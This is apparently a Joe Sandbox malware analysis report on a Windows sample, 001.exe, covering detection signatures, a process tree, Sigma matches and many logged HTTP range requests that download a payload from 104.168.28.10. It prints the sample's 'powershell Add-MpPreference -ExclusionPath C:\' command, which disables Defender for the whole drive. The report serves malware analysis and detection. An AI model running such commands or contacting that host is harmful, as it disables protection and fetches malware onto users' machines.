Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
001.exe

Overview

General Information

Sample name:001.exe
Analysis ID:1652602
MD5:0a0c875056017605d15ea70c51e5b561
SHA1:9a6b6bda290438c62d1e22367c7db802a2508f48
SHA256:c6d95641d4c62cf6acb2788cfbaae43e16ed5b18c67b8f1094e31cf96b7550ce
Tags:exeuser-skocherhan
Infos:

Detection

Score:88
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to evade analysis by execution special instruction (VM detection)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to load drivers
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates driver files
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Spawns drivers
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 001.exe (PID: 7944 cmdline: "C:\Users\user\Desktop\001.exe" MD5: 0A0C875056017605D15EA70C51E5B561)
    • powershell.exe (PID: 7960 cmdline: powershell Add-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5708 cmdline: powershell Remove-MpPreference -ExclusionPath C:\ MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\001.exe", ParentImage: C:\Users\user\Desktop\001.exe, ParentProcessId: 7944, ParentProcessName: 001.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7960, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\001.exe", ParentImage: C:\Users\user\Desktop\001.exe, ParentProcessId: 7944, ParentProcessName: 001.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7960, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell Add-MpPreference -ExclusionPath C:\, CommandLine: powershell Add-MpPreference -ExclusionPath C:\, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\001.exe", ParentImage: C:\Users\user\Desktop\001.exe, ParentProcessId: 7944, ParentProcessName: 001.exe, ProcessCommandLine: powershell Add-MpPreference -ExclusionPath C:\, ProcessId: 7960, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Windows\Temp\1Qkj6qa_7944.sysReversingLabs: Detection: 33%
Multi AV Scanner detection for submitted file
Source: 001.exeVirustotal: Detection: 36%Perma Link
Source: 001.exeReversingLabs: Detection: 33%
Joe Sandbox ML detected suspicious sample
Source: Submited SampleNeural Call Log Analysis: 92.8%
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008782FC malloc,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,free,1_2_008782FC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF028 CryptGenRandom,1_2_008BF028
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008BF078 CryptReleaseContext,1_2_008BF078
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008671EA CryptAcquireContextA,CryptCreateHash,1_2_008671EA
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008671E8 CryptAcquireContextA,CryptCreateHash,1_2_008671E8
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00867244 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_00867244
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0086E4C4 CryptAcquireContextA,CryptCreateHash,1_2_0086E4C4
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_00878478 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,1_2_00878478
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_0086E510 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_0086E510
Source: C:\Users\user\Desktop\001.exeCode function: -----BEGIN PUBLIC KEY-----1_2_0087F214
Source: C:\Users\user\Desktop\001.exeCode function: -----BEGIN PUBLIC KEY-----1_2_00853268
Source: 001.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: Binary string: J.Pdby source: 001.exe
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008935CC FindFirstFileA,FindNextFileA,FindClose,1_2_008935CC
Source: C:\Users\user\Desktop\001.exeCode function: 1_2_008B1C54 __doserrno,_errno,_errno,__doserrno,FindFirstFileA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,1_2_008B1C54
Source: Joe Sandbox ViewIP Address: 104.168.28.10 104.168.28.10
Source: global trafficHTTP traffic detected: HEAD /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-0User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=0-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=32768-49151User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=65536-81919User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=49152-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=114688-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=16384-32767User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=98304-114687User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=81920-98303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=131072-139263User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=139264-147455User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=147456-155647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=155648-172031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=172032-188415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=188416-204799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=204800-237567User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=188416-204799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=172032-188415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=237568-303103User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=172032-188415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=188416-204799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=303104-434175User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=434176-442367User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=442368-450559User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=450560-458751User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=458752-475135User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=475136-491519User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=491520-524287User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=524288-557055User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=557056-573439User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=573440-638975User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=638976-655359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=720896-753663User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=753664-786431User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=655360-720895User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=786432-917503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=917504-933887User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=933888-966655User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=966656-1032191User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1032192-1048575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1048576-1114111User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1114112-1122303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1122304-1130495User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1114112-1122303User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=13116-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=127798-131071User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=62264-65535User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1130496-1163263User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1163264-1196031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1196032-1212415User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1212416-1245183User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=13116-16383User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1245184-1249279User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1249280-1314815User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1314816-1380351User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1380352-1388543User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1388544-1396735User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1396736-1429503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1429504-1560575User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1560576-1691647User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1691648-1708031User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1708032-1740799User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1740800-1757183User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1757184-1773567User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1773568-1806335User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1806336-1871871User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1871872-1888255User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1888256-1921023User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1921024-1937407User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1937408-2002943User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=1871872-1888255User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2002944-2035711User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2035712-2166783User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2166784-2297855User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2297856-2330623User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2330624-2363391User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2363392-2428927User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2428928-2445311User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2445312-2453503User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2453504-2486271User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2486272-2551807User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2551808-2617343User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2617344-2633727User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2633728-2637823User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2637824-2670591User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2670592-2703359User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2703360-2719743User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2719744-2727935User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2727936-2760703User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
Source: global trafficHTTP traffic detected: GET /001/01/d1 HTTP/1.1Host: 104.168.28.10Range: bytes=2760704-2826239User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3Accept: */*
